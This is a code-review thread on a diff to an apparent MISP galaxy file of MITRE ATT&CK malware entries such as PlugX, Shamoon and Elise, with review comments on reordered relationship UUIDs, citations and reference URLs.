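Review bot: Moving `(Citation: Lastline PlugX Analysis)` to after "It has been used by multiple threat groups." changes which claim it supports — in the old text it backed the modular-plugin statement, in the new text it reads as a source for multi-group use — so if that is not deliberate, `uses modular plugins. (Citation: Lastline PlugX Analysis) It has been used by multiple threat groups.` keeps the original attribution. The new `http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf` ref has no matching citation marker in the description, unlike the other four, and it joins the existing `http://labs.lastline.com` entry as a plain-HTTP reference; prefer `https://` where the host serves it, since analysts pivot on these refs and an unauthenticated PDF download is an avoidable exposure. `DestroyRAT` is added to `synonyms`, which MISP matches on, so a ref documenting that alias would be worth adding alongside it.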
@@ -4166,35 +5194,28 @@ "type": "uses" }, { - "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4208,28 +5229,21 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4243,7 +5257,49 @@ "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4255,13 +5311,62 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", "value": "PlugX - S0013" }, { - "description": "[Shamoon](https://attack.mitre.org/software/S0140) is malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. The 2.0 version was seen in 2016 targeting Middle Eastern states. (Citation: FireEye Shamoon Nov 2016) (Citation: Palo Alto Shamoon Nov 2016)", + "description": "[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. 
[Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)", "meta": { "external_id": "S0140", "mitre_platforms": [ @@ -4269,8 +5374,10 @@ ], "refs": [ "https://attack.mitre.org/software/S0140", - "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/" + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/", + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "https://www.symantec.com/connect/blogs/shamoon-attacks", + "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html" ], "synonyms": [ "Shamoon", @@ -4292,6 +5399,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ 
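Review bot: The new Shamoon `description` value breaks across a physical line after "…observed in 2016 and 2018. " — if that is a raw newline inside the JSON string rather than an escaped `\n`, strict parsers reject the file (RFC 8259 requires control characters in strings to be escaped), so confirm the committed text contains `\n\n` at that point and not a literal line break. The reordered refs add the Unit 42 Shamoon 3 and Symantec URLs that the two new citation markers require, which keeps citations and refs in step. The `synonyms` list and the rest of this entry continue outside the hunk.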
@@ -4300,7 +5414,63 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4321,84 +5491,7 @@ "type": "uses" }, { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4412,7 +5505,35 @@ "type": "uses" }, { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4472,13 +5593,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -4492,6 +5606,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", @@ -4542,7 +5663,14 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4563,14 +5691,14 @@
 "type": "uses"
 },
 { 
- "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", 
+ "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 { 
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", 
+ "dest-uuid": "54456690-84de-4538-9101-643e26437e09",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ], 
@@ -4616,7 +5744,7 @@
 ],
 "refs": [
 "https://attack.mitre.org/software/S0061", 
- "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" 
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf"
 ],
 "synonyms": [
 "HDoor", 
@@ -4651,7 +5779,8 @@
 ],
 "refs": [
 "https://attack.mitre.org/software/S0017", 
- "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" 
+ "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", 
+ "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip"
 ],
 "synonyms": [
 "BISCUIT" 
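Review bot: The S0061 hunk replaces `https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf` with the `media.kasperskycontenthub.com` path instead of appending it, so a citation that existing consumers may already have indexed is dropped from `refs`; the BISCUIT hunk directly below appends its new appendix URL and keeps the old report URL, which is the safer pattern for a reference list that analysts pivot on. Consider keeping both URLs for S0061 unless the securelist one is known to be dead, and note the replacement in the commit message if it is.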
@@ -4671,6 +5800,69 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "b8eb28e4-48a6-40ae-951a-328714f75eda", 
@@ -4706,20 +5898,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -4727,6 +5905,41 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -4735,7 +5948,14 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4756,49 +5976,7 @@ "type": "uses" }, { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4812,21 +5990,35 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4878,7 +6070,7 @@ "value": "hcdLoader - S0071" }, { - "description": "[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of\ntools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)", + "description": "[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of\ntools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)", "meta": { "external_id": "S0081", "mitre_platforms": [ 
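Review bot: The new Elise description in `@@ -4878,7 +6070,7 @@` keeps the stray line break inside `larger group of\ntools` and appends an ATT&CK-internal `(Citation: Accenture Dragonfish Jan 2018)` token, neither of which means anything to a MISP user reading the galaxy; the citation's URL is only added in a separate hunk of the same entry, so this line on its own resolves to nothing. If the description is copied verbatim from the STIX object, the generator could at least collapse the embedded newline so the text reads `... part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU.`, and ideally map `(Citation: …)` tokens to the matching `refs` URL. The enclosing entry (S0081) begins in this hunk and ends outside it.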
@@ -4886,7 +6078,8 @@ ], "refs": [ "https://attack.mitre.org/software/S0081", - "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html" + "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html", + "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf" ], "synonyms": [ "Elise", @@ -4917,21 +6110,7 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4945,56 +6124,21 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5007,12 +6151,89 @@ ], "type": "uses" }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } 
], "uuid": "7551188b-8f91-4d34-8350-0d0c57b2b913", @@ -5042,27 +6263,6 @@ ], "type": "uses" }, - { - "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -5070,34 +6270,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dd43c543-bb85-4a6f-aa6e-160d90d06a49", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ 
@@ -5105,12 +6277,61 @@ ], "type": "uses" }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ 